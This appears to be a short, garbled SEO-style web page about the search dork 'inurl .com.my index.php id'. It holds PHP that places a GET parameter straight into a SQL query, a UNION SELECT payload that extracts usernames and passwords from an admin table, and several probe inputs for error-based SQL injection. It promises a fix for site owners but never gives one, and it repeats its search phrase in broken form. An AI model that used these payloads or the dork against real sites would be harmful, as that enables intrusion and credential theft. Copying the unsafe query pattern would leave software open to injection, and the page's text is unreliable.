Inurl - -.com.my Index.php Id
Vulnerable code example:
// index.php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $id"; // UNSAFE
$result = mysqli_query($conn, $query);
Exploit payload:
/index.php?id=123 UNION SELECT username, password FROM admin_users --
If your website appears in a search for inurl -.com.my index.php id, you have a potential security gap. Here is how to close it. inurl -.com.my index.php id
# Test for error-based SQLi
/index.php?id=123'
/index.php?id=123 AND 1=1
/index.php?id=123 AND 1=2